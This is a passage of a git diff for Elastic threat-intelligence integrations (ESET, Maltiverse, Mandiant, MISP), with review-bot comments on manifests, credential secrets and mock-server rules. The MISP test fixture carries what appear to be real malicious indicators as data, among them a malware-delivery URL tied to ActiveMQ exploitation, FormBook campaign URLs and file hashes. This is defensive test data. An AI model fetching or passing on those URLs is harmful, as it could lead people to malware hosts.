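Review bot: The markdown navigation panel's "Overview (This page)" link targets `/app/dashboards#/view/f608e350-8192-11ee-a704-a3364df0a052`, but this saved object's id is `ti_eset-f608e350-8192-11ee-a704-a3364df0a052` and the three sibling links all carry the `ti_eset-` prefix, so the self-link resolves to a dashboard id that does not exist in the package. The line should read `- **[Overview (This page)](/app/dashboards#/view/ti_eset-f608e350-8192-11ee-a704-a3364df0a052)**`. Two smaller consistency nits in the same hunk: the dashboard title is `"[Logs ESET] Overview "` with a trailing space, and the metric whose column label is "Total expired indicators" is titled "Total outdated indicators" on the panel, so one term should be picked. Since this JSON is a Kibana export, the cleanest route is to fix the saved object and re-export rather than hand-patch the file.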
+++ b/packages/ti_eset/kibana/tag/ti_eset-security-solution-default.json
@@ -0,0 +1,14 @@
+{
+ "attributes": {
+ "color": "#D36086",
+ "description": "",
+ "name": "Security Solution"
+ },
+ "coreMigrationVersion": "8.8.0",
+ "created_at": "2023-11-19T19:19:47.379Z",
+ "id": "ti_eset-security-solution-default",
+ "managed": true,
+ "references": [],
+ "type": "tag",
+ "typeMigrationVersion": "8.0.0"
+}
\ No newline at end of file
diff --git a/packages/ti_eset/manifest.yml b/packages/ti_eset/manifest.yml
new file mode 100644
index 00000000000..870fa245f8a
--- /dev/null
+++ b/packages/ti_eset/manifest.yml
@@ -0,0 +1,56 @@
+format_version: 3.0.3
+name: ti_eset
+title: "ESET Threat Intelligence"
+version: 0.1.0
+description: "Ingest threat intelligence indicators from ESET Threat Intelligence with Elastic Agent."
+type: integration
+categories:
+ - security
+ - threat_intel
+conditions:
+ kibana:
+ version: "^8.12.0"
+ elastic:
+ subscription: "basic"
+screenshots:
+ - src: /img/overview.png
+ title: threat intelligence overview
+ size: 600x600
+ type: image/png
+ - src: /img/files.png
+ title: threat intelligence files
+ size: 600x600
+ type: image/png
+ - src: /img/url-ip.png
+ title: threat intelligence domains, URLs and IPs
+ size: 600x600
+ type: image/png
+icons:
+ - src: /img/eset-lozenge-color-rgb.svg
+ title: Sample logo
+ size: 96x96
+ type: image/svg+xml
+policy_templates:
+ - name: eset
+ title: ETI feeds (TAXII version 2)
+ description: Collect data from ETI feeds (TAXII version 2)
+ inputs:
+ - type: httpjson
+ title: ETI feeds (TAXII version 2)
+ description: Collect data from ETI feeds (TAXII version 2)
+ vars:
+ - name: username
+ type: text
+ title: ETI Username
+ required: true
+ show_user: true
+ - name: password
+ type: password
+ title: ETI Password
+ multi: false
+ required: true
+ secret: true
+ show_user: true
+owner:
+ github: elastic/security-service-integrations
+ type: partner
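Review bot: The icon entry in the new ti_eset manifest still carries the placeholder `title: Sample logo`, which is the text shown for the image in the integrations UI; it should name the vendor, e.g. `title: ESET logo`. The `username` var omits `multi: false` while its sibling `password` sets it, so the two credential vars are declared with different shapes; adding `multi: false` to `username` keeps them parallel. The `secret: true` on `password` depends on the `^8.12.0` Kibana constraint that this manifest sets, which is consistent with the version bumps the other packages in this commit make for the same reason.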
diff --git a/packages/ti_maltiverse/changelog.yml b/packages/ti_maltiverse/changelog.yml index b8557d628fe..15bce69d730 100644 --- a/packages/ti_maltiverse/changelog.yml +++ b/packages/ti_maltiverse/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/ti_maltiverse/data_stream/indicator/manifest.yml b/packages/ti_maltiverse/data_stream/indicator/manifest.yml index 3855b0de795..144e4e5682a 100644 --- a/packages/ti_maltiverse/data_stream/indicator/manifest.yml +++ b/packages/ti_maltiverse/data_stream/indicator/manifest.yml @@ -7,11 +7,12 @@ streams: description: Fetches thread intelligence feeds from Maltiverse API vars: - name: api_token - type: text + type: password title: API Token description: Maltiverse API Token multi: false required: true + secret: true - name: feed type: text title: Feed diff --git a/packages/ti_maltiverse/manifest.yml b/packages/ti_maltiverse/manifest.yml index 2f73501d487..fc69bb0799c 100644 --- a/packages/ti_maltiverse/manifest.yml +++ b/packages/ti_maltiverse/manifest.yml @@ -1,13 +1,13 @@ name: ti_maltiverse title: Maltiverse -version: "1.0.1" +version: "1.1.0" description: Ingest threat intelligence indicators from Maltiverse feeds with Elastic Agent type: integration -format_version: 3.0.0 +format_version: 3.0.2 categories: ["security", "threat_intel"] conditions: kibana: - version: ^8.8.0 + version: ^8.12.0 icons: - src: /img/logo-maltiverse.svg title: Maltiverse diff --git a/packages/ti_mandiant_advantage/changelog.yml b/packages/ti_mandiant_advantage/changelog.yml index a1f4300624d..239aec69d00 100644 --- a/packages/ti_mandiant_advantage/changelog.yml +++ b/packages/ti_mandiant_advantage/changelog.yml 
@@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.1.1" + changes: + - description: Remove invalid field definition. + type: bugfix + link: https://github.com/elastic/integrations/pull/9309 +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/ti_mandiant_advantage/data_stream/threat_intelligence/fields/ecs.yml b/packages/ti_mandiant_advantage/data_stream/threat_intelligence/fields/ecs.yml index 0090bbfe7aa..b99f4c3fe77 100644 --- a/packages/ti_mandiant_advantage/data_stream/threat_intelligence/fields/ecs.yml +++ b/packages/ti_mandiant_advantage/data_stream/threat_intelligence/fields/ecs.yml @@ -1,5 +1,3 @@ -- external: ecs - name: cloud - external: ecs name: cloud.account.id dimension: true diff --git a/packages/ti_mandiant_advantage/data_stream/threat_intelligence/manifest.yml b/packages/ti_mandiant_advantage/data_stream/threat_intelligence/manifest.yml index da0dc258fd6..08ef6712b76 100644 --- a/packages/ti_mandiant_advantage/data_stream/threat_intelligence/manifest.yml +++ b/packages/ti_mandiant_advantage/data_stream/threat_intelligence/manifest.yml @@ -13,6 +13,7 @@ streams: multi: false required: true show_user: true + secret: false - name: mati_api_key_secret type: password title: Threat Intelligence API Key Secret @@ -20,6 +21,7 @@ streams: multi: false required: true show_user: true + secret: true - name: interval type: text title: Interval diff --git a/packages/ti_mandiant_advantage/docs/README.md b/packages/ti_mandiant_advantage/docs/README.md index 0d0da3633c9..3e1267d9baf 100644 --- a/packages/ti_mandiant_advantage/docs/README.md +++ b/packages/ti_mandiant_advantage/docs/README.md 
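Review bot: `secret: false` is added in the first data_stream manifest hunk to a variable whose definition starts above the hunk (the entry preceding `mati_api_key_secret`, presumably the key ID), with no explanation; an explicit opt-out on one half of an API credential pair will read as an oversight to the next reviewer. A short comment would make the decision auditable, e.g. `secret: false  # key ID is a non-sensitive identifier; only the paired key secret goes to the secret store`. The second hunk's `secret: true` on `mati_api_key_secret` is consistent with that var's `type: password`.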
@@ -167,7 +167,6 @@ An example event for `threat_intelligence` looks as following: | Field | Description | Type | |---|---|---| | @timestamp | Event timestamp. | date | -| cloud | Fields related to the cloud or infrastructure the events are coming from. | group | | cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | | cloud.account.name | The cloud account name or alias used to identify different entities in a multi-tenant environment. Examples: AWS account name, Google Cloud ORG display name. | keyword | | cloud.availability_zone | Availability zone in which this host, resource, or service is located. | keyword | diff --git a/packages/ti_mandiant_advantage/manifest.yml b/packages/ti_mandiant_advantage/manifest.yml index c83c5f53736..fc5877734e3 100644 --- a/packages/ti_mandiant_advantage/manifest.yml +++ b/packages/ti_mandiant_advantage/manifest.yml @@ -1,7 +1,7 @@ -format_version: 3.0.0 +format_version: 3.0.2 name: ti_mandiant_advantage title: "Mandiant Advantage" -version: 1.0.1 +version: 1.1.1 source: license: "Elastic-2.0" description: "Collect Threat Intelligence from products within the Mandiant Advantage platform." @@ -11,7 +11,7 @@ categories: - security conditions: kibana: - version: "^8.6.2" + version: "^8.12.0" elastic: subscription: basic screenshots: diff --git a/packages/ti_misp/_dev/deploy/docker/files/config.yml b/packages/ti_misp/_dev/deploy/docker/files/config.yml index e35e400564a..30126c00411 100644 --- a/packages/ti_misp/_dev/deploy/docker/files/config.yml +++ b/packages/ti_misp/_dev/deploy/docker/files/config.yml 
@@ -1,154 +1,34 @@ rules: - - path: /events/restSearch + - path: /events/restSearch # sequence 3, page 1 (repeats) methods: ["POST"] request_headers: Authorization: "test" Content-Type: application/json - request_body: /^{"limit":"10","page":"1","returnFormat":"json","timestamp":"\d+"/ + request_body: /^{"limit":"10","order":"timestamp","page":"1","returnFormat":"json","timestamp":"1621599936"/ responses: - status_code: 200 body: |- { - "response": [ - { - "Event": { - "Attribute": [ - { - "Galaxy": [], - "ShadowAttribute": [], - "category": "Payload delivery", - "comment": "filename content for test event 3", - "deleted": false, - "disable_correlation": false, - "distribution": "5", - "event_id": "3633", - "first_seen": null, - "id": "266263", - "last_seen": null, - "object_id": "0", - "object_relation": null, - "sharing_group_id": "0", - "timestamp": "1621589229", - "to_ids": false, - "type": "filename", - "uuid": "3b322e1a-1dd8-490c-ab96-12e1bc3ee6a3", - "value": "thetestfile.txt" - } - ], - "EventReport": [], - "Galaxy": [], - "Object": [ - { - "Attribute": [ - { - "Galaxy": [], - "ShadowAttribute": [], - "category": "Payload delivery", - "comment": "", - "deleted": false, - "disable_correlation": false, - "distribution": "5", - "event_id": "3633", - "first_seen": null, - "id": "266265", - "last_seen": null, - "object_id": "18207", - "object_relation": "sha256", - "sharing_group_id": "0", - "timestamp": "1621589548", - "to_ids": true, - "type": "sha256", - "uuid": "657c5f2b-9d68-4ff7-a9ad-ab9e6a6c953e", - "value": "f33c27745f2bd87344be790465ef984a972fd539dc83bd4f61d4242c607ef1ee" - } - ], - "ObjectReference": [], - "comment": "File object for event 3", - "deleted": false, - "description": "File object describing a file with meta-information", - "distribution": "5", - "event_id": "3633", - "first_seen": null, - "id": "18207", - "last_seen": null, - "meta-category": "file", - "name": "file", - "sharing_group_id": "0", - "template_uuid": 
"688c46fb-5edb-40a3-8273-1af7923e2215", - "template_version": "22", - "timestamp": "1621589548", - "uuid": "42a88ad4-6834-46a9-a18b-aff9e078a4ea" - } - ], - "Org": { - "id": "1", - "local": true, - "name": "ORGNAME", - "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" - }, - "Orgc": { - "id": "1", - "local": true, - "name": "ORGNAME", - "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" - }, - "RelatedEvent": [ - { - "Event": { - "Org": { - "id": "1", - "name": "ORGNAME", - "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" - }, - "Orgc": { - "id": "1", - "name": "ORGNAME", - "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" - }, - "analysis": "0", - "date": "2021-05-21", - "distribution": "1", - "id": "3631", - "info": "Test event 1 just atrributes", - "org_id": "1", - "orgc_id": "1", - "published": false, - "threat_level_id": "1", - "timestamp": "1621588162", - "uuid": "8ca56ae9-3747-4172-93d2-808da1a4eaf3" - } - } - ], - "ShadowAttribute": [], - "analysis": "0", - "attribute_count": "6", - "date": "2021-05-21", - "disable_correlation": false, - "distribution": "1", - "event_creator_email": "admin@admin.test", - "extends_uuid": "", - "id": "3633", - "info": "Test event 3 objects and attributes", - "locked": false, - "org_id": "1", - "orgc_id": "1", - "proposal_email_lock": false, - "publish_timestamp": "0", - "published": false, - "sharing_group_id": "0", - "threat_level_id": "1", - "timestamp": "1621592532", - "uuid": "4edb20c7-8175-484d-bdcd-fce6872c1ef3" - } - } - ] + "response": [] + } + - path: /events/restSearch # sequence 2, page 2 + methods: ["POST"] + request_headers: + Authorization: "test" + Content-Type: application/json + request_body: /^{"limit":"10","order":"timestamp","page":"2","returnFormat":"json","timestamp":"1621592532"/ + responses: + - status_code: 200 + body: |- + { + "response": [] } - - path: /events/restSearch + - path: /events/restSearch # sequence 2, page 1 methods: ["POST"] request_headers: Authorization: "test" Content-Type: application/json - 
request_body: /^{"limit":"10","page":"2","returnFormat":"json","timestamp":"\d+"/ + request_body: /^{"limit":"10","order":"timestamp","page":"1","returnFormat":"json","timestamp":"1621592532"/ responses: - status_code: 200 body: |- @@ -239,7 +119,7 @@ rules: "published": false, "sharing_group_id": "0", "threat_level_id": "2", - "timestamp": "1621588836", + "timestamp": "1621598836", "uuid": "efbca287-edb5-4ad7-b8e4-fe9da514a763" } }, @@ -255,7 +135,7 @@ rules: "uuid": "54323f2c-e50c-4268-896c-4867950d210b", "attribute_count": "29", "analysis": "2", - "timestamp": "1412579577", + "timestamp": "1621599936", "distribution": "3", "proposal_email_lock": false, "locked": false, 
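Review bot: The three `/events/restSearch` rules in this hunk differ only in `page` and the pinned `timestamp` inside `request_body`, and their trailing comments number them in reverse (`sequence 3` first, the generic `\d+` rules labelled `sequence 1` further down), which reads as if the mock matches rules top-down and the pinned timestamps must sit above the fallbacks; if that is the case it deserves one comment at the top of the file rather than being implied by the numbering. Suggest on the first line: `rules:  # matched top-down: fully pinned timestamps first, generic \d+ fallbacks (sequence 1) last`. The `request_body` patterns anchor only with `^`, so each rule is selected by its leading `limit`/`order`/`page`/`timestamp` fields alone, which is fine as long as the page/timestamp pair stays unique per rule.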
@@ -333,633 +213,810 @@ rules: } ] } - - path: /events/restSearch + - path: /events/restSearch # sequence 1, page 2 methods: ["POST"] request_headers: Authorization: "test" Content-Type: application/json - request_body: /^{"limit":"10","page":"3","returnFormat":"json","timestamp":"\d+"/ + request_body: /^{"limit":"10","order":"timestamp","page":"2","returnFormat":"json","timestamp":"\d+"/ responses: - status_code: 200 body: |- { "response": [] } - - path: /attributes/restSearch + - path: /events/restSearch # sequence 1, page 1 methods: ["POST"] request_headers: Authorization: "test" Content-Type: application/json - request_body: /^{"includeDecayScore":"true","limit":"10","page":"1","returnFormat":"json","timestamp":"\d+"/ + request_body: /^{"limit":"10","order":"timestamp","page":"1","returnFormat":"json","timestamp":"\d+"/ responses: - status_code: 200 body: |- { - "response": { - "Attribute": [ - { - "id": "1", - "event_id": "1", - "object_id": "0", - "object_relation": null, - "category": "External analysis", - "type": "link", - "to_ids": false, - "uuid": "542e4cbd-ee78-4a57-bfb8-1fda950d210b", - "timestamp": "1412320445", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "http://labs.opendns.com/2014/10/02/opendns-and-bash/", - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1", - "info": "OSINT ShellShock scanning IPs from OpenDNS", - "orgc_id": "2", - "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" - } - }, - { - "id": "2", - "event_id": "1", - "object_id": "0", - "object_relation": null, - "category": "External analysis", - "type": "link", - "to_ids": false, - "uuid": "542e4cbe-d560-4e14-9157-1fda950d210b", - "timestamp": "1412320446", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": 
"https://gist.github.com/andrewsmhay/de1cdc63d04c2bbf8c12", - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1", - "info": "OSINT ShellShock scanning IPs from OpenDNS", - "orgc_id": "2", - "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" + "response": [ + { + "Event": { + "Attribute": [ + { + "Galaxy": [], + "ShadowAttribute": [], + "category": "Payload delivery", + "comment": "filename content for test event 3", + "deleted": false, + "disable_correlation": false, + "distribution": "5", + "event_id": "3633", + "first_seen": null, + "id": "266263", + "last_seen": null, + "object_id": "0", + "object_relation": null, + "sharing_group_id": "0", + "timestamp": "1621589229", + "to_ids": false, + "type": "filename", + "uuid": "3b322e1a-1dd8-490c-ab96-12e1bc3ee6a3", + "value": "thetestfile.txt" } - }, - { - "id": "3", - "event_id": "1", - "object_id": "0", - "object_relation": null, - "category": "External analysis", - "type": "link", - "to_ids": false, - "uuid": "542e4cbe-12a4-4345-b0a4-1fda950d210b", - "timestamp": "1412320446", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "https://gist.githubusercontent.com/andrewsmhay/de1cdc63d04c2bbf8c12/raw/f20402cf5a0c646c63c4521f60587703fe654443/iplist", - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1", - "info": "OSINT ShellShock scanning IPs from OpenDNS", - "orgc_id": "2", - "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" + ], + "EventReport": [], + "Galaxy": [], + "Object": [ + { + "Attribute": [ + { + "Galaxy": [], + "ShadowAttribute": [], + "category": "Payload delivery", + "comment": "", + "deleted": false, + "disable_correlation": false, + "distribution": "5", + "event_id": "3633", + "first_seen": null, + "id": "266265", + "last_seen": null, + "object_id": "18207", + "object_relation": "sha256", + "sharing_group_id": "0", + "timestamp": "1621589548", + "to_ids": true, + 
"type": "sha256", + "uuid": "657c5f2b-9d68-4ff7-a9ad-ab9e6a6c953e", + "value": "f33c27745f2bd87344be790465ef984a972fd539dc83bd4f61d4242c607ef1ee" + } + ], + "ObjectReference": [], + "comment": "File object for event 3", + "deleted": false, + "description": "File object describing a file with meta-information", + "distribution": "5", + "event_id": "3633", + "first_seen": null, + "id": "18207", + "last_seen": null, + "meta-category": "file", + "name": "file", + "sharing_group_id": "0", + "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", + "template_version": "22", + "timestamp": "1621589548", + "uuid": "42a88ad4-6834-46a9-a18b-aff9e078a4ea" } + ], + "Org": { + "id": "1", + "local": true, + "name": "ORGNAME", + "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" }, - { - "id": "4", - "event_id": "1", - "object_id": "0", - "object_relation": null, - "category": "External analysis", - "type": "text", - "to_ids": false, - "uuid": "542e4ccc-b8fc-44af-959d-6ead950d210b", - "timestamp": "1412320460", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "Shellshock", - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1", - "info": "OSINT ShellShock scanning IPs from OpenDNS", - "orgc_id": "2", - "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" - } + "Orgc": { + "id": "1", + "local": true, + "name": "ORGNAME", + "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" }, - { - "id": "5", - "event_id": "1", - "object_id": "0", - "object_relation": null, - "category": "External analysis", - "type": "comment", - "to_ids": false, - "uuid": "542e4ce7-6120-41c0-8793-e90e950d210b", - "timestamp": "1412320487", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "Data encoded by David André", - "Event": { - "org_id": "1", - "distribution": "3", - 
"id": "1", - "info": "OSINT ShellShock scanning IPs from OpenDNS", - "orgc_id": "2", - "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" - } - }, - { - "id": "266790", - "event_id": "1279", - "object_id": "0", - "object_relation": null, - "category": "Network activity", - "type": "url", - "to_ids": true, - "uuid": "78f6d250-c68d-42df-8083-b55e4d20779e", - "timestamp": "1686914587", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "http://www.doordelivery.life/km37/", - "decay_score": [ - { - "score": -0, - "base_score": 0, - "decayed": true, - "DecayingModel": { - "id": "1", - "name": "test-decay-model" - } - }, - { - "score": 0, - "base_score": 50, - "decayed": true, - "DecayingModel": { - "id": "2", - "name": "test-decay-model-2" - } - } - ], - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1279", - "info": "FormBook campaign", - "orgc_id": "3", - "uuid": "f45fe125-7f3f-4335-bf74-5ab61eb5b645" - }, - "Tag": [ - { - "id": "10", - "name": "type:OSINT", - "colour": "#004646", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "204", - "name": "osint:lifetime=\"perpetual\"", - "colour": "#0071c3", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "540", - "name": "osint:certainty=\"50\"", - "colour": "#0087e8", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "11", - "name": "tlp:white", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "1051", - "name": "tlp:clear", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "338", - "name": "misp-galaxy:tool=\"FormBook\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 + "RelatedEvent": [ + { + "Event": { + "Org": { + "id": "1", + "name": "ORGNAME", + "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" }, - { - "id": "1056", - "name": 
"misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1566.001\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 + "Orgc": { + "id": "1", + "name": "ORGNAME", + "uuid": "78acad2d-cc2d-4785-94d6-b428a0070488" }, - { - "id": "474", - "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - } - ] + "analysis": "0", + "date": "2021-05-21", + "distribution": "1", + "id": "3631", + "info": "Test event 1 just atrributes", + "org_id": "1", + "orgc_id": "1", + "published": false, + "threat_level_id": "1", + "timestamp": "1621588162", + "uuid": "8ca56ae9-3747-4172-93d2-808da1a4eaf3" + } + } + ], + "ShadowAttribute": [], + "analysis": "0", + "attribute_count": "6", + "date": "2021-05-21", + "disable_correlation": false, + "distribution": "1", + "event_creator_email": "admin@admin.test", + "extends_uuid": "", + "id": "3633", + "info": "Test event 3 objects and attributes", + "locked": false, + "org_id": "1", + "orgc_id": "1", + "proposal_email_lock": false, + "publish_timestamp": "0", + "published": false, + "sharing_group_id": "0", + "threat_level_id": "1", + "timestamp": "1621592532", + "uuid": "4edb20c7-8175-484d-bdcd-fce6872c1ef3" + } + } + ] + } + - path: /attributes/restSearch # sequence 3, page 1 (repeats) + methods: ["POST"] + request_headers: + Authorization: "test" + Content-Type: application/json + request_body: /^{"includeDecayScore":"true","limit":"10","order":"timestamp","page":"1","returnFormat":"json","timestamp":"1700667505"/ + responses: + - status_code: 200 + body: "{\n \"response\": {\n \"Attribute\": []\n }\n} " + - path: /attributes/restSearch # sequence 2, page 2 + methods: ["POST"] + request_headers: + Authorization: "test" + Content-Type: application/json + request_body: /^{"includeDecayScore":"true","limit":"10","order":"timestamp","page":"2","returnFormat":"json","timestamp":"1412320446"/ + responses: + - status_code: 200 + 
body: "{\n \"response\": {\n \"Attribute\": []\n }\n} " + - path: /attributes/restSearch # sequence 2, page 1 + methods: ["POST"] + request_headers: + Authorization: "test" + Content-Type: application/json + request_body: /^{"includeDecayScore":"true","limit":"10","order":"timestamp","page":"1","returnFormat":"json","timestamp":"1412320446"/ + responses: + - status_code: 200 + body: |- + { + "response": { + "Attribute": [ + { + "id": "3", + "event_id": "1", + "object_id": "0", + "object_relation": null, + "category": "External analysis", + "type": "link", + "to_ids": false, + "uuid": "542e4cbe-12a4-4345-b0a4-1fda950d210b", + "timestamp": "1412320447", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "https://gist.githubusercontent.com/andrewsmhay/de1cdc63d04c2bbf8c12/raw/f20402cf5a0c646c63c4521f60587703fe654443/iplist", + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1", + "info": "OSINT ShellShock scanning IPs from OpenDNS", + "orgc_id": "2", + "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" + } + }, + { + "id": "4", + "event_id": "1", + "object_id": "0", + "object_relation": null, + "category": "External analysis", + "type": "text", + "to_ids": false, + "uuid": "542e4ccc-b8fc-44af-959d-6ead950d210b", + "timestamp": "1412320460", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "Shellshock", + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1", + "info": "OSINT ShellShock scanning IPs from OpenDNS", + "orgc_id": "2", + "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" + } + }, + { + "id": "5", + "event_id": "1", + "object_id": "0", + "object_relation": null, + "category": "External analysis", + "type": "comment", + "to_ids": false, + "uuid": "542e4ce7-6120-41c0-8793-e90e950d210b", + "timestamp": 
"1412320487", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "Data encoded by David André", + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1", + "info": "OSINT ShellShock scanning IPs from OpenDNS", + "orgc_id": "2", + "uuid": "542e4c9c-cadc-4f8f-bb11-6d13950d210b" + } + }, + { + "id": "266922", + "event_id": "1279", + "object_id": "20246", + "object_relation": "sha1", + "category": "Payload delivery", + "type": "sha1", + "to_ids": true, + "uuid": "84850997-631c-44ea-ac71-5f8bb4e6e1f0", + "timestamp": "1696914151", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "c514799ffdc38d48b7e90b8b6a324c354d1fd2a2", + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1279", + "info": "FormBook campaign", + "orgc_id": "3", + "uuid": "f45fe125-7f3f-4335-bf74-5ab61eb5b645" }, - { - "id": "268565", - "event_id": "1294", - "object_id": "0", - "object_relation": null, - "category": "Network activity", - "type": "url", - "to_ids": true, - "uuid": "ec341f4e-0f70-4569-8ac5-e35465572726", - "timestamp": "1700667504", + "Object": { + "id": "20246", "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "http://185.122.204.197/acb.sh", - "decay_score": [ - { - "score": 0, - "base_score": 0, - "decayed": true, - "DecayingModel": { - "id": "1", - "name": "test-decay-model" - } - }, - { - "score": 49.98530793883329, - "base_score": 50, - "decayed": false, - "DecayingModel": { - "id": "2", - "name": "test-decay-model-2" - } - } - ], - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1294", - "info": "CVE-2023-46604 (Apache ActiveMQ) Vulnerability Exploited to Infect Systems With Cryptominers and 
Rootkits", - "orgc_id": "3", - "uuid": "df7b7020-9f17-4a3c-9824-1baa4ff67cb1" + "sharing_group_id": "0" + }, + "Tag": [ + { + "id": "10", + "name": "type:OSINT", + "colour": "#004646", + "numerical_value": null, + "inherited": 1 }, - "Tag": [ - { - "id": "10", - "name": "type:OSINT", - "colour": "#004646", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "204", - "name": "osint:lifetime=\"perpetual\"", - "colour": "#0071c3", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "11", - "name": "tlp:white", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "1051", - "name": "tlp:clear", - "colour": "#ffffff", - "numerical_value": null, - "inherited": 1 - }, - { - "id": "713", - "name": "misp-galaxy:mitre-attack-pattern=\"Resource Hijacking - T1496\"", - "colour": "#0088cc", - "numerical_value": null, - "inherited": 1 - } - ] + { + "id": "204", + "name": "osint:lifetime=\"perpetual\"", + "colour": "#0071c3", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "540", + "name": "osint:certainty=\"50\"", + "colour": "#0087e8", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "11", + "name": "tlp:white", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1051", + "name": "tlp:clear", + "colour": "#ffffff", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "338", + "name": "misp-galaxy:tool=\"FormBook\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "1056", + "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1566.001\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + }, + { + "id": "474", + "name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"", + "colour": "#0088cc", + "numerical_value": null, + "inherited": 1 + } + ] + }, + { + "id": "266790", + "event_id": "1279", + "object_id": "0", + "object_relation": null, + "category": "Network activity", + 
"type": "url", + "to_ids": true, + "uuid": "78f6d250-c68d-42df-8083-b55e4d20779e", + "timestamp": "1686914587", + "distribution": "5", + "sharing_group_id": "0", + "comment": "", + "deleted": false, + "disable_correlation": false, + "first_seen": null, + "last_seen": null, + "value": "http://www.doordelivery.life/km37/", + "decay_score": [ + { + "score": -0, + "base_score": 0, + "decayed": true, + "DecayingModel": { + "id": "1", + "name": "test-decay-model" + } + }, + { + "score": 0, + "base_score": 50, + "decayed": true, + "DecayingModel": { + "id": "2", + "name": "test-decay-model-2" + } + } + ], + "Event": { + "org_id": "1", + "distribution": "3", + "id": "1279", + "info": "FormBook campaign", + "orgc_id": "3", + "uuid": "f45fe125-7f3f-4335-bf74-5ab61eb5b645" }, - { - "id": "266793", - "event_id": "1279", - "object_id": "0", - "object_relation": null, - "category": "Network activity", - "type": "url", - "to_ids": true, - "uuid": "efa8a550-bc25-4d93-abcd-1c00eaa4acdd", - "timestamp": "1686914587", - "distribution": "5", - "sharing_group_id": "0", - "comment": "", - "deleted": false, - "disable_correlation": false, - "first_seen": null, - "last_seen": null, - "value": "http://www.blueridgebedracks.com/km37/", - "decay_score": [ - { - "score": -0, - "base_score": 0, - "decayed": false, - "DecayingModel": { - "id": "1", - "name": "test-decay-model" - } - }, - { - "score": 0, - "base_score": 50, - "decayed": false, - "DecayingModel": { - "id": "2", - "name": "test-decay-model-2" - } - } - ], - "Event": { - "org_id": "1", - "distribution": "3", - "id": "1279", - "info": "FormBook campaign", - "orgc_id": "3", - "uuid": "f45fe125-7f3f-4335-bf74-5ab61eb5b645" + "Tag": [ + { + "id": "10", + "name": 